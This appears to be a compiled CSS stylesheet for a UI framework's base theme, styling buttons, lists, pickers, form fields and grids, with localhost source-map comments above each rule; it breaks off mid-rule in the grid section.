/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:30 */
.x-button-icon.x-hidden {
display: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:35 */
.x-iconalign-left,
.x-icon-align-right {
-webkit-box-orient: horizontal;
-ms-flex-direction: row;
flex-direction: row;
}
/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:40 */
.x-iconalign-top,
.x-iconalign-bottom {
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
}
/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:45 */
.x-iconalign-bottom,
.x-iconalign-right {
-webkit-box-direction: reverse;
-ms-flex-direction: row-reverse;
flex-direction: row-reverse;
}
/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:50 */
.x-iconalign-center {
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:55 */
.x-button-label,
.x-badge {
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
white-space: nowrap;
text-overflow: ellipsis;
text-align: center;
display: block;
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:65 */
.x-badge {
z-index: 2;
position: absolute;
text-overflow: ellipsis;
}
/* http://localhost:1843/modern/theme-base/sass/src/Sheet.scss:5 */
.x-sheet,
.x-sheet-action {
height: auto;
}
/* http://localhost:1843/modern/theme-base/sass/src/Media.scss:5 */
.x-video {
height: 100%;
width: 100%;
background-color: #000;
}
/* http://localhost:1843/modern/theme-base/sass/src/Media.scss:11 */
.x-video > * {
height: 100%;
width: 100%;
position: absolute;
}
/* http://localhost:1843/modern/theme-base/sass/src/Media.scss:17 */
.x-video-ghost {
-webkit-background-size: 100% auto;
background: #000 center center no-repeat;
}
/* http://localhost:1843/modern/theme-base/sass/src/Media.scss:22 */
audio {
width: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/Map.scss:5 */
.x-map {
background-color: #edeae2;
}
/* http://localhost:1843/modern/theme-base/sass/src/Map.scss:8 */
.x-map * {
-webkit-box-sizing: content-box;
box-sizing: content-box;
}
/* http://localhost:1843/modern/theme-base/sass/src/Map.scss:14 */
.x-mask-map {
background: transparent !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/Map.scss:18 */
.x-map-container {
position: absolute !important;
top: 0;
left: 0;
right: 0;
bottom: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Img.scss:6 */
.x-img.x-img-image {
text-align: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/Img.scss:9 */
.x-img.x-img-image img {
width: auto;
height: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/Img.scss:15 */
.x-img.x-img-background {
background-repeat: no-repeat;
background-position: center;
background-size: auto 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/Menu.scss:1 */
.x-menu {
background: #eee;
}
/* http://localhost:1843/modern/theme-base/sass/src/Toolbar.scss:5 */
.x-toolbar {
position: relative;
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/Toolbar.scss:10 */
.x-title {
text-align: center;
max-width: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/Toolbar.scss:14 */
.x-title .x-innerhtml {
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
/* http://localhost:1843/modern/theme-base/sass/src/Toolbar.scss:20 */
.x-navigation-bar .x-container {
overflow: visible;
}
/* http://localhost:1843/modern/theme-base/sass/src/Toolbar.scss:27 */
.x-toolbar-inner .x-field .x-component-outer {
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
}
/* http://localhost:1843/modern/theme-base/sass/src/Toolbar.scss:33 */
.x-ie .x-toolbar-inner {
height: 100% !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/MessageBox.scss:5 */
.x-msgbox {
min-width: 15em;
max-width: 20em;
max-height: 90%;
}
/* http://localhost:1843/modern/theme-base/sass/src/MessageBox.scss:11 */
.x-msgbox .x-docking-vertical {
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/MessageBox.scss:20 */
.x-ie .x-msgbox .x-dock.x-dock-horizontal.x-unsized > .x-dock-body {
-webkit-box-flex: 1;
-ms-flex: 1 0 0px;
flex: 1 0 0px;
}
/* http://localhost:1843/modern/theme-base/sass/src/MessageBox.scss:29 */
.x-msgbox-buttons .x-button {
min-width: 4.5em;
}
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:1 */
.x-progressindicator {
width: 50%;
height: 1.3em;
}
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:6 */
.x-progressindicator .x-progressindicator-inner {
background: #222;
padding: 10px;
height: 100%;
border-radius: 20px;
box-shadow: 0px 5px 17px rgba(40, 40, 40, 0.5);
box-sizing: content-box;
position: relative;
}
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:16 */
.x-progressindicator .x-progressindicator-text {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
width: 100%;
height: 100%;
position: absolute;
top: 0px;
left: 0px;
color: white;
text-shadow: 1px 1px 2px black;
}
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:29 */
.x-progressindicator .x-progressindicator-bar {
height: 100%;
width: 0%;
border-radius: 10px;
}
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:35 */
.x-progressindicator:not(.x-item-hidden) .x-progressindicator-bar .x-progressindicator-bar-fill {
height: 100%;
width: 100%;
background-color: gray;
border-radius: 10px;
-webkit-animation-name: progressIndicator;
-moz-animation-name: progressIndicator;
-ms-animation-name: progressIndicator;
-o-animation-name: progressIndicator;
animation-name: progressIndicator;
-webkit-animation-duration: 1s;
-moz-animation-duration: 1s;
-ms-animation-duration: 1s;
-o-animation-duration: 1s;
animation-duration: 1s;
-webkit-animation-timing-function: linear;
-moz-animation-timing-function: linear;
-ms-animation-timing-function: linear;
-o-animation-timing-function: linear;
animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;
-moz-animation-iteration-count: infinite;
-ms-animation-iteration-count: infinite;
-o-animation-iteration-count: infinite;
animation-iteration-count: infinite;
background-repeat: repeat-x;
background-size: 30px 30px;
background-image: -webkit-linear-gradient(-45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: -moz-linear-gradient(-45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: -o-linear-gradient(-45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: -ms-linear-gradient(-45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:52 */
@-webkit-keyframes progressIndicator {
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:54 */
to {
background-position: 30px;
}
}
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:58 */
@-moz-keyframes progressIndicator {
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:60 */
to {
background-position: 30px;
}
}
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:64 */
@keyframes progressIndicator {
/* http://localhost:1843/modern/theme-base/sass/src/ProgressIndicator.scss:66 */
to {
background-position: 30px;
}
}
/* http://localhost:1843/modern/theme-base/sass/src/Toast.scss:5 */
.x-toast {
min-width: 15em;
max-width: 20em;
max-height: 90%;
margin: 6px;
}
/* http://localhost:1843/modern/theme-base/sass/src/Toast.scss:12 */
.x-toast .x-toast-text {
text-align: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/Toast.scss:21 */
.x-ie .x-toast .x-dock.x-dock-horizontal.x-unsized > .x-dock-body {
-webkit-box-flex: 1;
-ms-flex: 1 0 0px;
flex: 1 0 0px;
}
/* http://localhost:1843/modern/theme-base/sass/src/carousel/Carousel.scss:1 */
.x-carousel-inner {
position: relative;
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/carousel/Carousel.scss:6 */
.x-carousel-item,
.x-carousel-item > * {
position: absolute !important;
width: 100%;
height: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/carousel/Carousel.scss:13 */
.x-carousel-indicator {
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/carousel/Carousel.scss:20 */
.x-carousel-indicator span {
display: block;
width: 10px;
height: 10px;
margin: 3px;
background-color: #eee;
}
/* http://localhost:1843/modern/theme-base/sass/src/carousel/Carousel.scss:27 */
.x-carousel-indicator span.x-carousel-indicator-active {
background-color: #ccc;
}
/* http://localhost:1843/modern/theme-base/sass/src/carousel/Carousel.scss:33 */
.x-carousel-indicator-horizontal {
width: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/carousel/Carousel.scss:37 */
.x-carousel-indicator-vertical {
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
height: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/DataView.scss:2 */
.x-dataview-inlineblock .x-dataview-item,
.x-dataview-inlineblock .x-data-item {
display: inline-block;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/DataView.scss:8 */
.x-dataview-nowrap .x-dataview-container {
white-space: nowrap !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/DataView.scss:14 */
.x-dataview-nowrap .x-container.x-dataview {
white-space: nowrap !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/IndexBar.scss:1 */
.x-indexbar-wrapper {
-webkit-box-pack: end !important;
-ms-flex-pack: end !important;
justify-content: flex-end !important;
pointer-events: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/IndexBar.scss:6 */
.x-indexbar {
pointer-events: auto;
z-index: 2;
min-height: 0 !important;
height: auto !important;
-webkit-box-flex: 0 !important;
-ms-flex: 0 0 auto !important;
flex: 0 0 auto !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/IndexBar.scss:14 */
.x-indexbar > div {
font-size: 0.6em;
text-align: center;
line-height: 1.1em;
font-weight: bold;
display: block;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/IndexBar.scss:23 */
.x-indexbar-vertical {
width: 15px;
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
margin-right: 15px;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/IndexBar.scss:29 */
.x-indexbar-horizontal {
height: 15px;
-webkit-box-orient: horizontal;
-ms-flex-direction: row;
flex-direction: row;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/IndexBar.scss:35 */
.x-phone.x-landscape .x-indexbar > div {
font-size: 0.38em;
line-height: 1em;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/IndexBar.scss:41 */
.x-indexbar-pressed {
background-color: #ccc;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:1 */
.x-list {
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:4 */
.x-list .x-scroll-scroller {
max-width: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:8 */
.x-list .x-list-inner {
width: 100% !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:12 */
.x-list .x-list-scrolldock-hidden {
display: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:16 */
.x-list .x-list-item {
position: absolute !important;
left: 0;
top: 0;
width: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:22 */
.x-list .x-list-item > .x-dock {
height: auto;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:26 */
.x-list .x-list-item .x-dock-horizontal {
border-top: 1px solid #ccc;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:32 */
.x-list .x-list-item.x-list-item-relative {
position: relative !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:38 */
.x-list .x-list-header.x-list-item-relative {
position: relative !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:43 */
.x-list .x-list-emptytext {
text-align: center;
pointer-events: none;
font-color: #333;
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:52 */
.x-list .x-list-scrolldockitem {
position: absolute !important;
left: 0;
top: 0;
width: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:63 */
.x-ie .x-list-grouped .x-translatable-container .x-list-item:before,
.x-ie .x-list-grouped .x-translatable-container .x-list-header:before {
content: ". .";
color: transparent;
position: absolute;
left: 0px;
word-spacing: 3000px;
opacity: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:74 */
.x-list-header {
position: absolute;
left: 0;
width: 100%;
z-index: 2 !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:81 */
.x-ios .x-list-header {
-webkit-transform: translate3d(0, 0, 0);
-moz-transform: translate3d(0, 0, 0);
-ms-transform: translate3d(0, 0, 0);
-o-transform: translate3d(0, 0, 0);
transform: translate3d(0, 0, 0);
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:85 */
.x-list-grouped .x-list-item.x-list-header-wrap .x-dock-horizontal,
.x-list-grouped .x-list-item-tpl.x-list-header-wrap {
border-top: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:91 */
.x-list-inlineblock .x-list-item {
display: inline-block;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:97 */
.x-list-nowrap .x-list-inner {
width: auto;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:101 */
.x-list-nowrap .x-list-container {
white-space: nowrap !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/dataview/List.scss:106 */
.x-list-item-dragging {
border-bottom: 1px solid #ccc;
background: #fff !important;
z-index: 1;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:5 */
.x-sheet.x-picker {
padding: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:9 */
.x-sheet.x-picker .x-sheet-inner {
background-color: #fff;
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:14 */
.x-sheet.x-picker .x-sheet-inner .x-picker-slot .x-body {
border-left: 1px solid #999;
border-right: 1px solid #acacac;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:20 */
.x-sheet.x-picker .x-sheet-inner .x-picker-slot.x-first .x-body {
border-left: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:26 */
.x-sheet.x-picker .x-sheet-inner .x-picker-slot.x-last .x-body {
border-left: 0;
border-right: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:34 */
.x-picker-slot .x-scroll-view {
z-index: 2;
position: relative;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:39 */
.x-picker-mask {
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
z-index: 3;
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-align: stretch;
-ms-flex-align: stretch;
align-items: stretch;
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
pointer-events: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:53 */
.x-picker-slot-title {
position: relative;
z-index: 2;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:57 */
.x-picker-slot-title > div {
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
font-weight: bold;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:64 */
.x-picker-slot .x-dataview-inner {
width: 100% !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:68 */
.x-picker-slot .x-dataview-item {
vertical-align: middle;
height: 30px;
line-height: 30px;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:73 */
.x-picker-slot .x-dataview-item.x-item-selected {
font-weight: bold;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:78 */
.x-picker-slot .x-picker-item {
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:83 */
.x-ie .x-picker-item {
cursor: default;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:87 */
.x-ie .x-picker-item::before {
content: ". .";
color: transparent;
position: absolute;
left: 0px;
word-spacing: 3000px;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:95 */
.x-picker-right {
text-align: right;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:99 */
.x-picker-center {
text-align: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/picker/Picker.scss:103 */
.x-picker-left {
text-align: left;
}
/* http://localhost:1843/modern/theme-base/sass/src/slider/Slider.scss:5 */
.x-slider,
.x-toggle {
position: relative;
height: 16px;
min-height: 0;
min-width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/slider/Slider.scss:12 */
.x-slider > *,
.x-toggle > * {
position: absolute;
width: 100%;
height: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/slider/Slider.scss:19 */
.x-thumb {
position: absolute;
height: 16px;
width: 10px;
border: 1px solid #ccc;
background-color: #ddd;
}
/* http://localhost:1843/modern/theme-base/sass/src/slider/Slider.scss:28 */
.x-slider:before {
content: '';
position: absolute;
width: auto;
height: 8px;
top: 4px;
left: 0;
right: 0;
margin: 0 5px;
background-color: #eee;
}
/* http://localhost:1843/modern/theme-base/sass/src/slider/Slider.scss:35 */
.x-toggle {
border: 1px solid #ccc;
width: 30px;
overflow: hidden;
-webkit-box-flex: 0;
-ms-flex: 0 0 auto;
flex: 0 0 auto;
}
/* http://localhost:1843/modern/theme-base/sass/src/slider/Slider.scss:42 */
.x-toggle-on {
background-color: #eee;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:2 */
.x-form-label {
display: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:5 */
.x-form-label-nowrap .x-form-label {
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:11 */
.x-field {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:14 */
.x-field .x-field-input {
position: relative;
min-width: 3.7em;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:19 */
.x-field .x-field-input,
.x-field .x-input-el {
width: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:25 */
.x-field.x-field-labeled .x-form-label {
display: block;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:30 */
.x-field .x-component-outer {
position: relative;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:35 */
.x-label-align-left,
.x-label-align-right {
-webkit-box-orient: horizontal !important;
-ms-flex-direction: row !important;
flex-direction: row !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:39 */
.x-label-align-left .x-component-outer,
.x-label-align-right .x-component-outer {
-webkit-box-flex: 1;
-ms-flex: 1 0 0px;
flex: 1 0 0px;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:44 */
.x-label-align-right {
-webkit-box-direction: reverse;
-ms-flex-direction: row-reverse;
flex-direction: row-reverse;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:48 */
.x-label-align-top,
.x-label-align-bottom {
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:53 */
.x-label-align-bottom {
-webkit-box-direction: reverse;
-ms-flex-direction: column-reverse;
flex-direction: column-reverse;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:57 */
.x-input-el {
display: block;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:61 */
.x-field-mask {
width: auto;
height: auto;
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:69 */
.x-ie .x-field.x-field-text .x-field-mask,
.x-ie .x-field.x-field-textarea .x-field-mask,
.x-ie .x-field.x-field-search .x-field-mask {
z-index: -1;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:76 */
.x-field-required .x-form-label:after {
content: "*";
display: inline;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:88 */
.x-spinner .x-component-outer {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:92 */
.x-spinner .x-component-outer > * {
width: auto;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:97 */
.x-spinner .x-field-input {
-webkit-box-flex: 1;
-ms-flex: 1 0 0px;
flex: 1 0 0px;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:100 */
.x-spinner .x-field-input .x-input-el {
width: 100%;
text-align: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:106 */
.x-spinner .x-field-input input::-webkit-outer-spin-button,
.x-spinner .x-field-input input::-webkit-inner-spin-button {
-webkit-appearance: none;
margin: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:113 */
.x-spinner .x-spinner-button {
text-align: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:118 */
.x-spinner.x-field-grouped-buttons .x-input-el {
text-align: left;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:127 */
.x-select-overlay .x-list-label {
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
display: block;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:135 */
input[type="search"]::-webkit-search-cancel-button {
-webkit-appearance: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:140 */
.x-field-number input::-webkit-outer-spin-button,
.x-field-number input::-webkit-inner-spin-button {
-webkit-appearance: none;
margin: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:147 */
.x-field-input .x-clear-icon,
.x-field-input .x-reveal-icon {
display: none;
position: absolute;
top: 50%;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:154 */
.x-field-clearable .x-clear-icon {
display: block;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:160 */
.x-field-revealable .x-reveal-icon {
display: block;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:165 */
.x-android .x-input-el {
-webkit-text-fill-color: #000;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:169 */
.x-android .x-empty .x-input-el {
-webkit-text-fill-color: #a9a9a9;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:173 */
.x-android .x-item-disabled .x-input-el {
-webkit-text-fill-color: #b3b3b3;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:179 */
.x-form-fieldset .x-form-fieldset-inner {
border: 1px solid #ccc;
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:185 */
.x-form-fieldset .x-dock .x-dock-body {
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:191 */
.x-form-fieldset-title {
font-weight: bold;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:194 */
.x-form-fieldset-title .x-innerhtml {
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:199 */
.x-form-fieldset-instructions {
text-align: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/form/Panel.scss:204 */
.x-ie .x-field-select .x-field-mask {
z-index: 3;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:1 */
.x-grid .x-dock-body > .x-body {
width: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:4 */
.x-grid-header-container {
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:8 */
.x-grid-headergroup-inner {
white-space: nowrap;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:10 */
.x-grid-headergroup-inner > .x-innerhtml {
text-align: center;
overflow: hidden;
text-overflow: ellipsis;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:17 */
.x-grid-row {
position: absolute;
left: 0;
top: 0;
display: table;
table-layout: fixed;
width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:29 */
.x-grid-cell {
display: table-cell;
vertical-align: middle;
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:35 */
.x-grid-cell-inner {
text-overflow: ellipsis;
overflow: hidden;
white-space: nowrap;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:41 */
.x-grid-cell-hidden {
display: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:45 */
.x-grid-cell-align-center,
.x-grid-column-align-center {
text-align: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:50 */
.x-grid-cell-align-right,
.x-grid-column-align-right {
text-align: right;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:55 */
.x-grid-viewoptions {
border-width: 0 0 0 1px;
border-style: solid;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:59 */
.x-grid-viewoptions .x-list-item.x-item-selected.x-list-item-tpl,
.x-grid-viewoptions .x-list-item.x-item-pressed.x-list-item-tpl {
background: transparent;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:62 */
.x-grid-viewoptions .x-list-item.x-item-selected.x-list-item-tpl .x-innerhtml,
.x-grid-viewoptions .x-list-item.x-item-pressed.x-list-item-tpl .x-innerhtml {
background: transparent;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:68 */
.x-grid-columnoptions {
border-width: 0 0 1px;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:72 */
.x-grid-multiselection-column {
position: relative;
padding: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:76 */
.x-grid-multiselection-column:after {
position: absolute;
top: 0;
left: 0;
width: 60px;
height: 64px;
line-height: 64px;
font-family: 'Pictos';
font-size: 26px;
text-align: center;
content: "2";
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:90 */
.x-grid-multiselection-cell {
position: relative;
padding: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:94 */
.x-grid-multiselection-cell:after {
position: absolute;
top: 0;
left: 0;
width: 60px;
height: 60px;
line-height: 60px;
font-family: 'Pictos';
font-size: 20px;
text-align: center;
content: "_";
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:108 */
.x-item-selected .x-grid-multiselection-cell:after {
content: "3";
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:113 */
.x-grid-pagingtoolbar > .x-body {
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:118 */
.x-grid-pagingtoolbar-currentpage {
position: relative;
height: 22px;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:122 */
.x-grid-pagingtoolbar-currentpage span {
position: absolute;
right: 0;
top: 0;
line-height: 22px;
height: 22px;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:131 */
.x-grid-summaryrow {
position: relative;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:135 */
.x-grid-summaryrow .x-grid-multiselection-cell:after {
content: '';
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:142 */
.x-ie .x-grid-grouped .x-translatable-container .x-grid-row:before,
.x-ie .x-grid-grouped .x-translatable-container .x-grid-header:before {
content: ". .";
color: transparent;
position: absolute;
left: 0px;
word-spacing: 3000px;
opacity: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:153 */
.x-grid-header {
position: absolute;
left: 0;
width: 100%;
z-index: 2 !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:160 */
.x-ios .x-grid-header {
-webkit-transform: translate3d(0, 0, 0);
